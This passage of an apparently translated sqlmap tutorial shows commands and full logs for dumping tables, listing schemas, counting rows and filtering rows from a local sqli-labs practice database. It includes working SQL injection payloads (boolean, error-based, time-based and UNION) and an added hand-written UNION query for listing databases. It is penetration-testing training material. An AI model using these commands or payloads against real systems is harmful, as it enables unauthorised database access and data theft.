| Column | Type |
+--------+-------------+
| id | int(4) |
| name | varchar(36) |
+--------+-------------+
Database: demo1125
Table: provinces
[3 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| id | int(11) |
| province | varchar(100) |
| provinceid | int(11) |
+------------+--------------+
Database: demo1125
Table: student
[3 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| gid | int(4) |
| sid | int(4) |
| sname | varchar(36) |
+--------+-------------+
Database: demo1125
Table: v_p_c
[5 columns]
+--------+-----------------+
| Column | Type |
+--------+-----------------+
| cname | varchar(120) |
| id | int(5) unsigned |
| name | varchar(120) |
| pid | int(5) unsigned |
| type | tinyint(1) |
+--------+-----------------+
[08:51:32] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:51:33 /2020-03-02/
The columns of every table in the database were enumerated, with their types.
Restricting the listing to one table:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D demo1125 --tables -T student --columns
Output:
[*] starting @ 08:53:57 /2020-03-02/
[08:53:57] [INFO] resuming back-end DBMS 'mysql'
[08:53:57] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[08:53:57] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[08:53:58] [INFO] fetching tables for database: 'demo1125'
[08:53:58] [INFO] resumed: 'areas'
[08:53:58] [INFO] resumed: 'cities'
[08:53:58] [INFO] resumed: 'classes'
[08:53:58] [INFO] resumed: 'provinces'
[08:53:58] [INFO] resumed: 'student'
[08:53:58] [INFO] resumed: 'v_p_c'
Database: demo1125
[6 tables]
+-----------+
| areas |
| cities |
| classes |
| provinces |
| student |
| v_p_c |
+-----------+
[08:53:58] [INFO] fetching columns for table 'student' in database 'demo1125'
[08:53:58] [INFO] resumed: 'sid','int(4)'
[08:53:58] [INFO] resumed: 'sname','varchar(36)'
[08:53:58] [INFO] resumed: 'gid','int(4)'
Database: demo1125
Table: student
[3 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| gid | int(4) |
| sid | int(4) |
| sname | varchar(36) |
+--------+-------------+
[08:53:58] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:53:58 /2020-03-02/
Only the columns of the specified table were enumerated.
4. sqlmap: dumping table data
Option:
--dump
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D demo1125 --tables -T student --columns --dump
Output:
[*] starting @ 08:56:31 /2020-03-02/
[08:56:31] [INFO] resuming back-end DBMS 'mysql'
[08:56:31] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[08:56:31] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[08:56:31] [INFO] fetching tables for database: 'demo1125'
[08:56:31] [INFO] resumed: 'areas'
[08:56:31] [INFO] resumed: 'cities'
[08:56:31] [INFO] resumed: 'classes'
[08:56:31] [INFO] resumed: 'provinces'
[08:56:31] [INFO] resumed: 'student'
[08:56:31] [INFO] resumed: 'v_p_c'
Database: demo1125
[6 tables]
+-----------+
| areas |
| cities |
| classes |
| provinces |
| student |
| v_p_c |
+-----------+
[08:56:31] [INFO] fetching columns for table 'student' in database 'demo1125'
[08:56:31] [INFO] resumed: 'sid','int(4)'
[08:56:31] [INFO] resumed: 'sname','varchar(36)'
[08:56:31] [INFO] resumed: 'gid','int(4)'
Database: demo1125
Table: student
[3 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| gid | int(4) |
| sid | int(4) |
| sname | varchar(36) |
+--------+-------------+
[08:56:31] [INFO] fetching columns for table 'student' in database 'demo1125'
[08:56:31] [INFO] resumed: 'sid','int(4)'
[08:56:31] [INFO] resumed: 'sname','varchar(36)'
[08:56:31] [INFO] resumed: 'gid','int(4)'
[08:56:31] [INFO] fetching entries for table 'student' in database 'demo1125'
[08:56:31] [INFO] retrieved: '1','3','Jack'
[08:56:31] [INFO] retrieved: '1','4','Jack'
[08:56:31] [INFO] retrieved: '1','5','Jack'
[08:56:31] [INFO] retrieved: '1','8','Jack'
[08:56:31] [INFO] retrieved: '1','9','Jack'
[08:56:32] [INFO] retrieved: '1','10','Jackson'
[08:56:32] [INFO] retrieved: '1','22','Jack'
[08:56:32] [INFO] retrieved: '1','26','Tom'
[08:56:32] [INFO] retrieved: '1','27','Tommy'
Database: demo1125
Table: student
[9 entries]
+-----+-----+---------+
| gid | sid | sname |
+-----+-----+---------+
| 1 | 3 | Jack |
| 1 | 4 | Jack |
| 1 | 5 | Jack |
| 1 | 8 | Jack |
| 1 | 9 | Jack |
| 1 | 10 | Jackson |
| 1 | 22 | Jack |
| 1 | 26 | Tom |
| 1 | 27 | Tommy |
+-----+-----+---------+
[08:56:32] [INFO] table 'demo1125.student' dumped to CSV file 'xxxx\sqlmap\output\127.0.0.1\dump\demo1125\student.csv'
[08:56:32] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:56:32 /2020-03-02/
The table's rows were retrieved. sqlmap also writes them to the CSV file named at the end of the log, under its output directory; that directory holds everything pulled from the target and should be protected (and deleted) as carefully as the target's own data.
5. sqlmap: enumerating the schema
Option:
--schema
Lists the DBMS schema: every database, every table and every column together with the column types.
--exclude-sysdbs excludes the system databases.
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --schema
Output: (screenshot in the original post, not reproduced here)
The result contains every database, the tables in each database and the columns of each table, but no row data.
This run is slow, because it also walks the many system tables, which rarely tells you anything useful.
Add --exclude-sysdbs to skip the system databases and run it again:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --schema --exclude-sysdbs
Output: (screenshot in the original post, not reproduced here)
This run is much faster.
6. sqlmap: counting table rows
Option:
--count
Use this when you only want to know how many rows each table holds, without dumping them.
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --count -D demo1125
Output:
[*] starting @ 09:12:39 /2020-03-02/
[09:12:40] [INFO] resuming back-end DBMS 'mysql'
[09:12:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[09:12:40] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[09:12:40] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[09:12:40] [INFO] fetching tables for database: 'demo1125'
[09:12:40] [INFO] resumed: 'areas'
[09:12:40] [INFO] resumed: 'cities'
[09:12:40] [INFO] resumed: 'classes'
[09:12:40] [INFO] resumed: 'provinces'
[09:12:40] [INFO] resumed: 'student'
[09:12:40] [INFO] resumed: 'v_p_c'
Database: demo1125
+-----------+---------+
| Table | Entries |
+-----------+---------+
| areas | 3409 |
| cities | 345 |
| provinces | 34 |
| v_p_c | 14 |
| student | 9 |
+-----------+---------+
[09:12:40] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 09:12:40 /2020-03-02/
This gives the row count of every table in the database (no -T was given, hence the warning). The counts are the cheapest way to decide which tables are worth a --dump before pulling thousands of rows through the injection point.
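What the enumeration options in sections 1 to 6 (and --start/--stop, described in the next section) reduce to on the wire, as an added example that is not part of the original post: the information_schema queries sqlmap issues for --dbs, --tables, --columns, --schema, --count and --dump, written as plain MySQL for the lab's demo1125 database. The database, table and column names come from the output above; the 3-column UNION shape in the last comment comes from the injection point sqlmap recorded for Less-1, and the -1 id value in it is an assumption (any non-existent id works).

```sql
-- Added example, not part of the original post: the information_schema
-- queries that sqlmap's --dbs / --tables / --columns / --schema / --count /
-- --dump reduce to on MySQL, typed into a client on the lab instance.
-- Database demo1125 and its tables come from the sqlmap output above.

-- --dbs : one row per database
SELECT schema_name FROM information_schema.SCHEMATA;

-- --dbs --exclude-sysdbs : the four MySQL system schemas seen above are
-- the ones --exclude-sysdbs leaves out; the same filter is what makes
-- --schema --exclude-sysdbs so much faster than plain --schema.
SELECT schema_name FROM information_schema.SCHEMATA
WHERE schema_name NOT IN ('information_schema', 'mysql', 'performance_schema', 'sys');

-- --tables -D demo1125
SELECT table_name FROM information_schema.TABLES
WHERE table_schema = 'demo1125';

-- --columns -D demo1125 -T student  (sqlmap's "Type" column is column_type)
SELECT column_name, column_type FROM information_schema.COLUMNS
WHERE table_schema = 'demo1125' AND table_name = 'student';

-- --schema --exclude-sysdbs : the whole listing in one query
SELECT table_schema, table_name, column_name, column_type
FROM information_schema.COLUMNS
WHERE table_schema NOT IN ('information_schema', 'mysql', 'performance_schema', 'sys')
ORDER BY table_schema, table_name, ordinal_position;

-- --count -D demo1125 : an exact COUNT(*) per table. information_schema.TABLES
-- has a table_rows column, but for InnoDB it is only an estimate, so it is
-- not a substitute.
SELECT COUNT(*) FROM demo1125.areas;     -- 3409 in the run above
SELECT COUNT(*) FROM demo1125.student;   -- 9

-- --dump -D demo1125 -T student (sqlmap orders the columns alphabetically)
SELECT gid, sid, sname FROM demo1125.student;

-- --start 1 --stop 3 : rows 1..3 of each dumped table, i.e. LIMIT offset,count
SELECT id, pid, name, type FROM demo1125.areas LIMIT 0, 3;

-- The same listing through the injection point, in the 3-column UNION shape
-- sqlmap recorded for Less-1 (id is a string parameter, hence the closing
-- quote and the "-- -" comment; the third column is the one the page
-- reflects). The 0x71... literals in sqlmap's own payload are its marker
-- strings 'qxqjq' and 'qxjpq', used to cut the result out of the HTML.
-- ?id=-1' UNION ALL SELECT NULL, NULL,
--   (SELECT GROUP_CONCAT(schema_name) FROM information_schema.SCHEMATA)-- -
```

Running these by hand (for instance through the hackbar plugin introduced later in the post) is the fastest way to confirm a sqlmap finding, and the first thing to try when sqlmap's enumeration stalls: if the hand-written query returns nothing, the account usually lacks the privilege on information_schema rather than the injection having failed.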
7. sqlmap: dumping a range of rows
Options:
--start and --stop
For example --start 1 --stop 3 returns rows 1 to 3 of each table being dumped (the equivalent of LIMIT 0,3).
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D demo1125 --tables --start 1 --stop 3 --dump
Output:
[*] starting @ 09:16:35 /2020-03-02/
[09:16:36] [INFO] resuming back-end DBMS 'mysql'
[09:16:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[09:16:36] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[09:16:36] [INFO] fetching tables for database: 'demo1125'
[09:16:36] [INFO] resumed: 'areas'
[09:16:36] [INFO] resumed: 'cities'
[09:16:36] [INFO] resumed: 'classes'
[09:16:36] [INFO] resumed: 'provinces'
[09:16:36] [INFO] resumed: 'student'
[09:16:36] [INFO] resumed: 'v_p_c'
Database: demo1125
[6 tables]
+-----------+
| areas |
| cities |
| classes |
| provinces |
| student |
| v_p_c |
+-----------+
[09:16:36] [INFO] fetching columns for table 'areas' in database 'demo1125'
[09:16:36] [INFO] resumed: 'id','int(5) unsigned'
[09:16:36] [INFO] resumed: 'pid','int(5) unsigned'
[09:16:36] [INFO] resumed: 'name','varchar(120)'
[09:16:36] [INFO] resumed: 'type','tinyint(1)'
[09:16:36] [INFO] fetching entries for table 'areas' in database 'demo1125'
[09:16:36] [INFO] retrieved: '1','中国','0','0'
[09:16:36] [INFO] retrieved: '2','北京','1','1'
[09:16:36] [INFO] retrieved: '3','安徽','1','1'
Database: demo1125
Table: areas
[3 entries]
+----+-----+------+------+
| id | pid | name | type |
+----+-----+------+------+
| 1 | 0 | 中国 | 0 |
| 2 | 1 | 北京 | 1 |
| 3 | 1 | 安徽 | 1 |
+----+-----+------+------+
[09:16:36] [INFO] table 'demo1125.areas' dumped to CSV file 'xxxx\sqlmap\output\127.0.0.1\dump\demo1125\areas.csv'
[09:16:36] [INFO] fetching columns for table 'cities' in database 'demo1125'
[09:16:36] [INFO] resumed: 'id','int(11)'
[09:16:36] [INFO] resumed: 'cityid','char(6)'
[09:16:36] [INFO] resumed: 'city','varchar(40)'
[09:16:36] [INFO] resumed: 'provinceid','char(6)'
[09:16:36] [INFO] fetching entries for table 'cities' in database 'demo1125'
[09:16:36] [INFO] retrieved: '北京市','110100','1','110000'
[09:16:36] [INFO] retrieved: '北京下属县','1102xx','2','1100xx'
[09:16:36] [INFO] retrieved: '天津市','120100','3','120000'
Database: demo1125
Table: cities
[3 entries]
+----+--------+------------+------------+
| id | cityid | provinceid | city |
+----+--------+------------+------------+
| 1 | 110100 | 110000 | 北京市 |
| 2 | 1102xx | 1100xx | 北京下属县 |
| 3 | 120100 | 120000 | 天津市 |
+----+--------+------------+------------+
[09:16:36] [INFO] table 'demo1125.cities' dumped to CSV file 'xxxx\sqlmap\output\127.0.0.1\dump\demo1125\cities.csv'
[09:16:36] [INFO] fetching columns for table 'classes' in database 'demo1125'
[09:16:36] [INFO] resumed: 'id','int(4)'
[09:16:36] [INFO] resumed: 'name','varchar(36)'
[09:16:36] [INFO] fetching entries for table 'classes' in database 'demo1125'
[09:16:36] [INFO] fetching number of entries for table 'classes' in database 'demo1125'
[09:16:36] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:16:36] [INFO] retrieved: 0
[09:16:36] [WARNING] table 'classes' in database 'demo1125' appears to be empty
Database: demo1125
Table: classes
[0 entries]
+----+------+
| id | name |
+----+------+
+----+------+
[09:16:36] [INFO] table 'demo1125.classes' dumped to CSV file 'xxxx\sqlmap\output\127.0.0.1\dump\demo1125\classes.csv'
[09:16:36] [INFO] fetching columns for table 'provinces' in database 'demo1125'
[09:16:36] [INFO] resumed: 'id','int(11)'
[09:16:36] [INFO] resumed: 'provinceid','int(11)'
[09:16:36] [INFO] resumed: 'province','varchar(100)'
[09:16:36] [INFO] fetching entries for table 'provinces' in database 'demo1125'
[09:16:36] [INFO] retrieved: '1','北京市','110000'
[09:16:36] [INFO] retrieved: '2','天津市','120000'
[09:16:36] [INFO] retrieved: '3','河北省','130000'
Database: demo1125
Table: provinces
[3 entries]
+----+------------+----------+
| id | provinceid | province |
+----+------------+----------+
| 1 | 110000 | 北京市 |
| 2 | 120000 | 天津市 |
| 3 | 130000 | 河北省 |
+----+------------+----------+
[09:16:36] [INFO] table 'demo1125.provinces' dumped to CSV file 'xxxx\sqlmap\output\127.0.0.1\dump\demo1125\provinces.csv'
[09:16:36] [INFO] fetching columns for table 'student' in database 'demo1125'
[09:16:36] [INFO] resumed: 'sid','int(4)'
[09:16:36] [INFO] resumed: 'sname','varchar(36)'
[09:16:36] [INFO] resumed: 'gid','int(4)'
[09:16:36] [INFO] fetching entries for table 'student' in database 'demo1125'
[09:16:36] [INFO] resumed: '1','3','Jack'
[09:16:36] [INFO] resumed: '1','4','Jack'
[09:16:36] [INFO] resumed: '1','5','Jack'
Database: demo1125
Table: student
[3 entries]
+-----+-----+-------+
| gid | sid | sname |
+-----+-----+-------+
| 1 | 3 | Jack |
| 1 | 4 | Jack |
| 1 | 5 | Jack |
+-----+-----+-------+
[09:16:36] [INFO] table 'demo1125.student' dumped to CSV file 'xxxx\sqlmap\output\127.0.0.1\dump\demo1125\student.csv'
[09:16:36] [INFO] fetching columns for table 'v_p_c' in database 'demo1125'
[09:16:36] [INFO] resumed: 'id','int(5) unsigned'
[09:16:36] [INFO] resumed: 'pid','int(5) unsigned'
[09:16:36] [INFO] resumed: 'name','varchar(120)'
[09:16:36] [INFO] resumed: 'type','tinyint(1)'
[09:16:36] [INFO] resumed: 'cname','varchar(120)'
[09:16:36] [INFO] fetching entries for table 'v_p_c' in database 'demo1125'
[09:16:37] [INFO] retrieved: '长沙','14','湖南','1','1'
[09:16:37] [INFO] retrieved: '张家界','14','湖南','1','1'
[09:16:37] [INFO] retrieved: '常德','14','湖南','1','1'
Database: demo1125
Table: v_p_c
[3 entries]
+----+-----+------+------+--------+
| id | pid | name | type | cname |
+----+-----+------+------+--------+
| 14 | 1 | 湖南 | 1 | 长沙 |
| 14 | 1 | 湖南 | 1 | 张家界 |
| 14 | 1 | 湖南 | 1 | 常德 |
+----+-----+------+------+--------+
[09:16:37] [INFO] table 'demo1125.v_p_c' dumped to CSV file 'xxxx\sqlmap\output\127.0.0.1\dump\demo1125\v_p_c.csv'
[09:16:37] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 09:16:37 /2020-03-02/
Clearly, when a table holds fewer than 3 rows only part of them (or nothing) is shown, and when it holds 3 or more, rows 1 to 3 are shown.
Similarly to --start and --stop, the --first and --last parameters retrieve a field's content from the Nth character to the Mth character.
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D demo1125 --tables -T v_p_c --first 3 --last 5 --dump
Output:
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:45:23 /2020-03-02/
[09:45:23] [INFO] resuming back-end DBMS 'mysql'
[09:45:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[09:45:23] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[09:45:23] [INFO] fetching tables for database: 'demo1125'
[09:45:23] [INFO] resumed: 'areas'
[09:45:23] [INFO] resumed: 'cities'
[09:45:23] [INFO] resumed: 'classes'
[09:45:23] [INFO] resumed: 'provinces'
[09:45:23] [INFO] resumed: 'student'
[09:45:23] [INFO] resumed: 'v_p_c'
Database: demo1125
[6 tables]
+-----------+
| areas |
| cities |
| classes |
| provinces |
| student |
| v_p_c |
+-----------+
[09:45:23] [INFO] fetching columns for table 'v_p_c' in database 'demo1125'
[09:45:23] [INFO] resumed: 'id','int(5) unsigned'
[09:45:23] [INFO] resumed: 'pid','int(5) unsigned'
[09:45:23] [INFO] resumed: 'name','varchar(120)'
[09:45:23] [INFO] resumed: 'type','tinyint(1)'
[09:45:23] [INFO] resumed: 'cname','varchar(120)'
[09:45:23] [INFO] fetching entries for table 'v_p_c' in database 'demo1125'
[09:45:23] [INFO] resumed: '长沙','14','湖南','1','1'
[09:45:23] [INFO] resumed: '张家界','14','湖南','1','1'
[09:45:24] [INFO] resumed: '常德','14','湖南','1','1'
[09:45:24] [INFO] resumed: '郴州','14','湖南','1','1'
[09:45:24] [INFO] resumed: '衡阳','14','湖南','1','1'
[09:45:24] [INFO] resumed: '怀化','14','湖南','1','1'
[09:45:24] [INFO] resumed: '娄底','14','湖南','1','1'
[09:45:24] [INFO] resumed: '邵阳','14','湖南','1','1'
[09:45:24] [INFO] resumed: '湘潭','14','湖南','1','1'
[09:45:24] [INFO] resumed: '湘西','14','湖南','1','1'
[09:45:24] [INFO] resumed: '益阳','14','湖南','1','1'
[09:45:24] [INFO] resumed: '永州','14','湖南','1','1'
[09:45:24] [INFO] resumed: '岳阳','14','湖南','1','1'
[09:45:24] [INFO] resumed: '株洲','14','湖南','1','1'
Database: demo1125
Table: v_p_c
[14 entries]
+----+-----+------+------+--------+
| id | pid | name | type | cname |
+----+-----+------+------+--------+
| 14 | 1 | 湖南 | 1 | 长沙 |
| 14 | 1 | 湖南 | 1 | 张家界 |
| 14 | 1 | 湖南 | 1 | 常德 |
| 14 | 1 | 湖南 | 1 | 郴州 |
| 14 | 1 | 湖南 | 1 | 衡阳 |
| 14 | 1 | 湖南 | 1 | 怀化 |
| 14 | 1 | 湖南 | 1 | 娄底 |
| 14 | 1 | 湖南 | 1 | 邵阳 |
| 14 | 1 | 湖南 | 1 | 湘潭 |
| 14 | 1 | 湖南 | 1 | 湘西 |
| 14 | 1 | 湖南 | 1 | 益阳 |
| 14 | 1 | 湖南 | 1 | 永州 |
| 14 | 1 | 湖南 | 1 | 岳阳 |
| 14 | 1 | 湖南 | 1 | 株洲 |
+----+-----+------+------+--------+
[09:45:24] [INFO] table 'demo1125.v_p_c' dumped to CSV file 'xxxx\sqlmap\output\127.0.0.1\dump\demo1125\v_p_c.csv'
[09:45:24] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 09:45:24 /2020-03-02/
The result shows no obvious difference. This is because --first and --last only take effect during blind injection; the other techniques retrieve the injected content exactly and do not need to guess it character by character.
8. sqlmap: retrieving data under a condition
Parameter:
--where
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D demo1125 --tables -T v_p_c --where="id>5" --dump
Output:
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:49:59 /2020-03-02/
[09:50:00] [INFO] resuming back-end DBMS 'mysql'
[09:50:00] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[09:50:00] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[09:50:00] [INFO] fetching tables for database: 'demo1125'
[09:50:00] [INFO] resumed: 'areas'
[09:50:00] [INFO] resumed: 'cities'
[09:50:00] [INFO] resumed: 'classes'
[09:50:00] [INFO] resumed: 'provinces'
[09:50:00] [INFO] resumed: 'student'
[09:50:00] [INFO] resumed: 'v_p_c'
Database: demo1125
[6 tables]
+-----------+
| areas |
| cities |
| classes |
| provinces |
| student |
| v_p_c |
+-----------+
[09:50:00] [INFO] fetching columns for table 'v_p_c' in database 'demo1125'
[09:50:00] [INFO] resumed: 'id','int(5) unsigned'
[09:50:00] [INFO] resumed: 'pid','int(5) unsigned'
[09:50:00] [INFO] resumed: 'name','varchar(120)'
[09:50:00] [INFO] resumed: 'type','tinyint(1)'
[09:50:00] [INFO] resumed: 'cname','varchar(120)'
[09:50:00] [INFO] fetching entries for table 'v_p_c' in database 'demo1125'
[09:50:00] [INFO] retrieved: '长沙','14','湖南','1','1'
[09:50:00] [INFO] retrieved: '张家界','14','湖南','1','1'
[09:50:00] [INFO] retrieved: '常德','14','湖南','1','1'
[09:50:00] [INFO] retrieved: '郴州','14','湖南','1','1'
[09:50:00] [INFO] retrieved: '衡阳','14','湖南','1','1'
[09:50:00] [INFO] retrieved: '怀化','14','湖南','1','1'
[09:50:01] [INFO] retrieved: '娄底','14','湖南','1','1'
[09:50:01] [INFO] retrieved: '邵阳','14','湖南','1','1'
[09:50:01] [INFO] retrieved: '湘潭','14','湖南','1','1'
[09:50:01] [INFO] retrieved: '湘西','14','湖南','1','1'
[09:50:01] [INFO] retrieved: '益阳','14','湖南','1','1'
[09:50:01] [INFO] retrieved: '永州','14','湖南','1','1'
[09:50:01] [INFO] retrieved: '岳阳','14','湖南','1','1'
[09:50:01] [INFO] retrieved: '株洲','14','湖南','1','1'
Database: demo1125
Table: v_p_c
[14 entries]
+----+-----+------+------+--------+
| id | pid | name | type | cname |
+----+-----+------+------+--------+
| 14 | 1 | 湖南 | 1 | 长沙 |
| 14 | 1 | 湖南 | 1 | 张家界 |
| 14 | 1 | 湖南 | 1 | 常德 |
| 14 | 1 | 湖南 | 1 | 郴州 |
| 14 | 1 | 湖南 | 1 | 衡阳 |
| 14 | 1 | 湖南 | 1 | 怀化 |
| 14 | 1 | 湖南 | 1 | 娄底 |
| 14 | 1 | 湖南 | 1 | 邵阳 |
| 14 | 1 | 湖南 | 1 | 湘潭 |
| 14 | 1 | 湖南 | 1 | 湘西 |
| 14 | 1 | 湖南 | 1 | 益阳 |
| 14 | 1 | 湖南 | 1 | 永州 |
